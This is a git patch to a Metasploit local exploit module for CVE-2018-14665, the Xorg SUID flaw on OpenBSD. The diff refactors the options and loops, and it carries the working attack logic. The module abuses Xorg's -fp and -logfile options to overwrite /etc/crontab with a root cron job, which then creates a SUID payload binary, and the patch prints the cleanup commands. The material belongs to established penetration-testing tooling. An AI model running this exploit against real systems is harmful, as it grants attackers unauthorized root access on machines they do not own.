From 012c8a450fe3facd92fa6b63a3db923bda8df2b3 Mon Sep 17 00:00:00 2001
From: Aaron Ringo <ringo.aaron@gmail.com>
Date: Wed, 7 Nov 2018 12:13:37 -0600
Subject: [PATCH] Feedback from PR work cont.  changed loop, formatting errors,
 options

---
 .../openbsd/local/xorg_x11_suid_server.rb     | 48 +++++++++++--------
 1 file changed, 28 insertions(+), 20 deletions(-)

diff --git a/modules/exploits/openbsd/local/xorg_x11_suid_server.rb b/modules/exploits/openbsd/local/xorg_x11_suid_server.rb
index eeb4b656f3..acb39c06bd 100644
--- a/modules/exploits/openbsd/local/xorg_x11_suid_server.rb
+++ b/modules/exploits/openbsd/local/xorg_x11_suid_server.rb
@@ -22,8 +22,9 @@ class MetasploitModule < Msf::Exploit::Local
         that start the server the ability to elevate privileges and run
         arbitrary code under root privileges.
 
-        This module writes a cron job using the Xorg -logfile option. The job
-        will run a small script to launch a payload. It has been tested with
+        This module writes a cron job using the Xorg -logfile option. On write
+        crontab.old will be created so it must be removed after exploit.  Cron
+        will then run a small script to launch a payload. It has been tested with
         OpenBSD 6.3,6.4 and CentOS 7.  Xorg must have SUID permissions. Success
         on CentOS depends on the session having console for starting Xorg
         along with selinux settings, may work but is currently not supported.
@@ -43,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Local
            [ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html' ],
            [ 'URL', 'https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm' ]
         ],
-      'Platform'       =>  %w(linux unix openbsd),
+      'Platform'       =>  %w(unix openbsd),
       'Arch'           =>    ARCH_CMD,
       'SessionTypes'   =>    'shell',
       'Targets'        =>
@@ -60,10 +61,15 @@ class MetasploitModule < Msf::Exploit::Local
       'DefaultTarget'  => 0))
     register_options(
       [
-        OptString.new('SCRIPT', [ true, 'Dir for crontab script', '/tmp/' ]),
         OptString.new('PAYLOAD_LOC', [ true, 'SUID binary to create', '/usr/local/bin/shell' ]),
         OptBool.new('BUILTIN', [ true, 'Privesc in current session', true ])
       ])
+     register_advanced_options(
+      [
+         OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
+         OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ])
+      ]
+    )
   end
 
 
@@ -71,20 +77,22 @@ class MetasploitModule < Msf::Exploit::Local
     xorg_path = cmd_exec("which Xorg")
     vprint_good 'Xorg path found at #{xorg_path}'
 
+    #<Version check here
+
     unless setuid? xorg_path
       vprint_error 'Xorg binary #{xorg_path} is not SUID'
       return CheckCode::Safe
     end
-      vprint_good 'Xorg binary #{xorg_path} is SUID'
+    vprint_good 'Xorg binary #{xorg_path} is SUID'
 
-      proc_list = []
-      proc_list = cmd_exec("ps ax")
-      if proc_list.include?('X')
-        vprint_warning('Xorg in process list. Can you stop it?')
-        return CheckCode::Safe
-      else
-        vprint_good('Xorg does not appear running')
-        return CheckCode::Detected
+    proc_list = []
+    proc_list = cmd_exec("ps ax")
+    if proc_list.include?('X')
+      vprint_warning('Xorg in process list. Can you stop it?')
+      return CheckCode::Safe
+    else
+      vprint_good('Xorg does not appear running')
+      return CheckCode::Detected
     end
   end
 
@@ -99,9 +107,10 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     # Defines path to script that will chmod the payload
+    xdisplay = datastore['Xdisplay']
     builtin_only = datastore['BUILTIN']
     payload_path = datastore['PAYLOAD_LOC']
-    pscript = "#{datastore['SCRIPT']}.session-#{rand_text_alphanumeric 5..10}"
+    pscript = "#{datastore['WritableDir']}/.session-#{rand_text_alphanumeric 5..10}"
     payload_c = "#{pscript}.c"
 
     #File crontab will run
@@ -133,21 +142,19 @@ class MetasploitModule < Msf::Exploit::Local
 
     # Actual exploit with cron overwrite
     print_status 'Trying /etc/crontab overwrite'
-    cmd_exec "cd /etc ; Xorg -fp '* * * * * root #{pscript}' -logfile crontab :1 & >/dev/null"
+    cmd_exec "cd /etc ; Xorg -fp '* * * * * root #{pscript}' -logfile crontab #{xdisplay} & >/dev/null"
     Rex.sleep 5
     cmd_exec "pkill Xorg"
     Rex.sleep 5
-    cron_check = cmd_exec "egrep #{pscript} /etc/crontab"
+    cron_check = cmd_exec "grep -F #{pscript} /etc/crontab"
     unless cron_check.include? pscript
       fail_with Failure::NotVulnerable, '/etc/crontab not modified'
     end
     print_good '/etc/crontab overwrite successful'
 
-    i = 0
-    while i < 12
+    12.times do
       print_status 'Waiting on cron to run'
       Rex.sleep 10
-      i += 1
       break if exists? payload_path
       break unless exists? pscript      # will be cleaned up on successful exploit
     end
@@ -164,9 +171,10 @@ class MetasploitModule < Msf::Exploit::Local
       end
     else
       Rex.sleep 2
+      #<on_next_session for this?
       print_status "This scripts' session does not have root"
       print_warning 'You have some clean-up to do in new session'
-      print_warning 'cat #{pscript}.b > /etc/crontab ; rm -f #{pscript}.*'
+      print_warning "cat #{pscript}.b > /etc/crontab ; rm -f #{pscript}.*"
       print_warning 'rm -f /etc/crontab.old'
     end
   end